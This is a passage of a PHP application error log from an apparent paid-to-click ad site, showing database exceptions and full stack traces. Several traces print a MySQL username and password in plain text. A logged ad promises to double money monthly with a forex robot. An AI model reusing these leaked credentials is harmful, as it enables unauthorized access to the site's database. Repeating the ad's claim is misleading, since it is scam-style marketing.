NULL,[] => 0,[] => 1))),[3] => Array ([file] => C:ServerptclibrariessantilgacontrollerController.php,[line] => 131,[function] => viewAction,[class] => Ad_Controller,[type] => ->,[args] => Array ()),[4] => Array ([file] => C:ServerptclibrariessantilgaapplicationApplication.php,[line] => 49,[function] => dispatch,[class] => Santilga_Controller,[type] => ->,[args] => Array ()),[5] => Array ([file] => C:Serverptcpublic_htmlindex.php,[line] => 37,[function] => run,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))<br /> Error!! 26.06.10 07:57:28- Uncaught Santilga_Database_Exception, code: 1265,Message: Data truncated for column 'moneyEarned' at row 1,SQL:INSERT INTO click ( `userId`,`adId`,`type`,`status`,`moneyEarned`,`dateClicked` ) VALUES ( 4, 2, '30', 'PENDING', '0,000', '2010-06-26 07:57:28' ) <br /><br /> #0 Santilga_Error->ExceptionHandler(Santilga_Database_Exception Object ([] => Data truncated for column 'moneyEarned' at row 1,SQL:INSERT INTO click ( `userId`,`adId`,`type`,`status`,`moneyEarned`,`dateClicked` ) VALUES ( 4, 2, '30', 'PENDING', '0,000', '2010-06-26 07:57:28' ) ,[] => ,[] => 1265,[] => C:ServerptclibrariessantilgadatabasedriverMysql.php,[] => 62,[] => Array ([0] => Array ([file] => C:ServerptclibrariessantilgamodelModel.php,[line] => 428,[function] => query,[class] => Santilga_Database_Driver_Mysql,[type] => ->,[args] => Array ([0] => INSERT INTO click ( `userId`,`adId`,`type`,`status`,`moneyEarned`,`dateClicked` ) VALUES ( 4, 2, '30', 'PENDING', '0,000', '2010-06-26 07:57:28' ) )),[1] => Array ([file] => C:ServerptcapplicationcontrollersAd.php,[line] => 125,[function] => insertBean,[class] => Santilga_Model,[type] => ->,[args] => Array ([0] => Array ([userId] => 4,[adId] => 2,[type] => '30',[status] => PENDING,[moneyEarned] => 0,000,[dateClicked] => 2010-06-26 07:57:28))),[2] => Array ([file] => C:ServerptcapplicationcontrollersAd.php,[line] => 92,[function] => _addPendingClick,[class] => Ad_Controller,[type] => ->,[args] => Array ([0] => 4,[1] => Ad_Bean Object ([] => ad,[] => id,[] => 2,[] => 3,[] => 3,[] => FAP Turbo - The Forex Robot,[] => Double your money every single month! ,[] => ,[] => 30,[] => 200,[] => http://google.com,[] => NULL,[] => 0,[] => 1))),[3] => Array ([file] => C:ServerptclibrariessantilgacontrollerController.php,[line] => 131,[function] => viewAction,[class] => Ad_Controller,[type] => ->,[args] => Array ()),[4] => Array ([file] => C:ServerptclibrariessantilgaapplicationApplication.php,[line] => 49,[function] => dispatch,[class] => Santilga_Controller,[type] => ->,[args] => Array ()),[5] => Array ([file] => C:Serverptcpublic_htmlindex.php,[line] => 37,[function] => run,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))<br /> Error!! 26.06.10 12:23:29- Uncaught Santilga_Database_Exception, code: 1064,Message: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '12:23:29 - dateClicked < 3600 LIMIT 0,1' at line 1,SQL:SELECT `click`.* FROM click WHERE adId='2' AND userId='4' AND 2010-06-26 12:23:29 - dateClicked < 3600 LIMIT 0,1<br /><br /> #0 Santilga_Error->ExceptionHandler(Santilga_Database_Exception Object ([] => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '12:23:29 - dateClicked < 3600 LIMIT 0,1' at line 1,SQL:SELECT `click`.* FROM click WHERE adId='2' AND userId='4' AND 2010-06-26 12:23:29 - dateClicked < 3600 LIMIT 0,1,[] => ,[] => 1064,[] => C:ServerptclibrariessantilgadatabasedriverMysql.php,[] => 62,[] => Array ([0] => Array ([file] => C:ServerptclibrariessantilgadatabasedriverMysql.php,[line] => 72,[function] => query,[class] => Santilga_Database_Driver_Mysql,[type] => ->,[args] => Array ([0] => SELECT `click`.* FROM click WHERE adId='2' AND userId='4' AND 2010-06-26 12:23:29 - dateClicked < 3600 LIMIT 0,1)),[1] => Array ([file] => C:ServerptclibrariessantilgamodelModel.php,[line] => 104,[function] => getResultRow,[class] => Santilga_Database_Driver_Mysql,[type] => ->,[args] => Array ([0] => SELECT `click`.* FROM click WHERE adId='2' AND userId='4' AND 2010-06-26 12:23:29 - dateClicked < 3600 LIMIT 0,1)),[2] => Array ([file] => C:ServerptcapplicationcontrollersAd.php,[line] => 196,[function] => getOneBean,[class] => Santilga_Model,[type] => ->,[args] => Array ([0] => Array ([0] => adId='2',[1] => userId='4',[2] => 2010-06-26 12:23:29 - dateClicked < 3600),[1] => Array (),[2] => 1)),[3] => Array ([file] => C:ServerptcapplicationcontrollersAd.php,[line] => 92,[function] => _oneDayPassed,[class] => Ad_Controller,[type] => ->,[args] => Array ([0] => 4,[1] => 2)),[4] => Array ([file] => C:ServerptclibrariessantilgacontrollerController.php,[line] => 131,[function] => viewAction,[class] => Ad_Controller,[type] => ->,[args] => Array ()),[5] => Array ([file] => C:ServerptclibrariessantilgaapplicationApplication.php,[line] => 49,[function] => dispatch,[class] => Santilga_Controller,[type] => ->,[args] => Array ()),[6] => Array ([file] => C:Serverptcpublic_htmlindex.php,[line] => 37,[function] => run,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))<br /> Error!! 26.06.10 13:12:53- Uncaught Santilga_Database_Exception, code: 2,Message: Could not connect to MySQL Access denied for user 'santilga_ptc'@'localhost' (using password: YES)<br /><br /> #0 Santilga_Error->ExceptionHandler(Santilga_Database_Exception Object ([] => Could not connect to MySQL Access denied for user 'santilga_ptc'@'localhost' (using password: YES),[] => ,[] => 2,[] => C:Serverptcpublic_htmllibrariessantilgadatabasedriverMysql.php,[] => 18,[] => Array ([0] => Array ([file] => C:Serverptcpublic_htmllibrariessantilgadatabaseDatabase.php,[line] => 39,[function] => __construct,[class] => Santilga_Database_Driver_Mysql,[type] => ->,[args] => Array ([0] => Array ([driver] => mysql,[host] => localhost,[user] => santilga_ptc,[password] => DOU~VV1Ab+QT,[database] => santilga_ptc))),[1] => Array ([file] => C:Serverptcpublic_htmllibrariessantilgainitInit.php,[line] => 55,[function] => getInstance,[class] => Santilga_Database,[type] => ::,[args] => Array ()),[2] => Array ([file] => C:Serverptcpublic_htmllibrariessantilgainitInit.php,[line] => 10,[function] => initDb,[class] => Santilga_Init,[type] => ->,[args] => Array ()),[3] => Array ([file] => C:Serverptcpublic_htmlapplicationInit.php,[line] => 6,[function] => init,[class] => Santilga_Init,[type] => ->,[args] => Array ()),[4] => Array ([file] => C:Serverptcpublic_htmllibrariessantilgaapplicationApplication.php,[line] => 31,[function] => init,[class] => Init,[type] => ->,[args] => Array ()),[5] => Array ([file] => C:Serverptcpublic_htmlindex.php,[line] => 35,[function] => __construct,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))<br /> Error!! 26.06.10 13:12:54- Uncaught Santilga_Database_Exception, code: 2,Message: Could not connect to MySQL Access denied for user 'santilga_ptc'@'localhost' (using password: YES)<br /><br /> #0 Santilga_Error->ExceptionHandler(Santilga_Database_Exception Object ([] => Could not connect to MySQL Access denied for user 'santilga_ptc'@'localhost' (using password: YES),[] => ,[] => 2,[] => C:Serverptcpublic_htmllibrariessantilgadatabasedriverMysql.php,[] => 18,[] => Array ([0] => Array ([file] => C:Serverptcpublic_htmllibrariessantilgadatabaseDatabase.php,[line] => 39,[function] => __construct,[class] => Santilga_Database_Driver_Mysql,[type] => ->,[args] => Array ([0] => Array ([driver] => mysql,[host] => localhost,[user] => santilga_ptc,[password] => DOU~VV1Ab+QT,[database] => santilga_ptc))),[1] => Array ([file] => C:Serverptcpublic_htmllibrariessantilgainitInit.php,[line] => 55,[function] => getInstance,[class] => Santilga_Database,[type] => ::,[args] => Array ()),[2] => Array ([file] => C:Serverptcpublic_htmllibrariessantilgainitInit.php,[line] => 10,[function] => initDb,[class] => Santilga_Init,[type] => ->,[args] => Array ()),[3] => Array ([file] => C:Serverptcpublic_htmlapplicationInit.php,[line] => 6,[function] => init,[class] => Santilga_Init,[type] => ->,[args] => Array ()),[4] => Array ([file] => C:Serverptcpublic_htmllibrariessantilgaapplicationApplication.php,[line] => 31,[function] => init,[class] => Init,[type] => ->,[args] => Array ()),[5] => Array ([file] => C:Serverptcpublic_htmlindex.php,[line] => 35,[function] => __construct,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))<br /> Error!! 26.06.10 13:12:55- Uncaught Santilga_Database_Exception, code: 2,Message: Could not connect to MySQL Access denied for user 'santilga_ptc'@'localhost' (using password: YES)<br /><br /> #0 Santilga_Error->ExceptionHandler(Santilga_Database_Exception Object ([] => Could not connect to MySQL Access denied for user 'santilga_ptc'@'localhost' (using password: YES),[] => ,[] => 2,[] => C:Serverptcpublic_htmllibrariessantilgadatabasedriverMysql.php,[] => 18,[] => Array ([0] => Array ([file] => C:Serverptcpublic_htmllibrariessantilgadatabaseDatabase.php,[line] => 39,[function] => __construct,[class] => Santilga_Database_Driver_Mysql,[type] => ->,[args] => Array ([0] => Array ([driver] => mysql,[host] => localhost,[user] => santilga_ptc,[password] => DOU~VV1Ab+QT,[database] => santilga_ptc))),[1] => Array ([file] => C:Serverptcpublic_htmllibrariessantilgainitInit.php,[line] => 55,[function] => getInstance,[class] => Santilga_Database,[type] => ::,[args] => Array ()),[2] => Array ([file] => C:Serverptcpublic_htmllibrariessantilgainitInit.php,[line] => 10,[function] => initDb,[class] => Santilga_Init,[type] => ->,[args] => Array ()),[3] => Array ([file] => C:Serverptcpublic_htmlapplicationInit.php,[line] => 6,[function] => init,[class] => Santilga_Init,[type] => ->,[args] => Array ()),[4] => Array ([file] => C:Serverptcpublic_htmllibrariessantilgaapplicationApplication.php,[line] => 31,[function] => init,[class] => Init,[type] => ->,[args] => Array ()),[5] => Array ([file] => C:Serverptcpublic_htmlindex.php,[line] => 35,[function] => __construct,[class] => Santilga_Application,[type] => ->,[args] => Array ()))))<br /> Error!! 26.06.10 13:12:56- Uncaught Santilga_Database_Exception, code: 2,Message: Could not connect to MySQL Access denied for user 'santilga_ptc'@'localhost' (using password: YES)<br /><br /> #0 Santilga_Error->ExceptionHandler(Santilga_Database_Exception Object ([] => Could not connect to MySQL Access denied for user 'santilga_ptc'@'localhost' (using password: YES),[] => ,[] => 2,[] => C:Serverptcpublic_htmllibrariessantilgadatabas
